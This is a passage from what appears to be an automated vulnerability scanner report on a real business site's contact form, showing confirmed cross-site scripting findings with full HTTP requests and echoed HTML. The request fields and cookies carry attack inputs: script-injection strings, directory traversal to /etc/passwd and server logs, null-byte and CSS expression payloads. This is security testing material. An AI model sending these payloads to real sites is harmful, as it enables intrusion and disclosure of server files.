Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> 
</td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td width="473" valign="top" style="padding:15px 0 0 0;"> ..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST '"--></style></script><script>alert(0x000B9F)</script>
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B9F)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=9BACDA5BFEAA33699135F145358F44AA; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000B9F)</script>" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; 
border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter      Type  Value
button         POST  Submit
captchaString  POST  3
comments       POST  3
company        POST  3
email          POST  '"--></style></script><script>alert(0x000BBC)</script>
firstName      POST  Smith
lastName       POST  Smith
leadCategory   POST  3
phone          POST  3
subCategoryId  POST  -1
url            POST  3
value          POST  3
yourInterest   POST  3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 242
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BBC)%3c%2fscript%3e&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:11 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=704C1101476EED0A9208F7BBBA4809EF; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
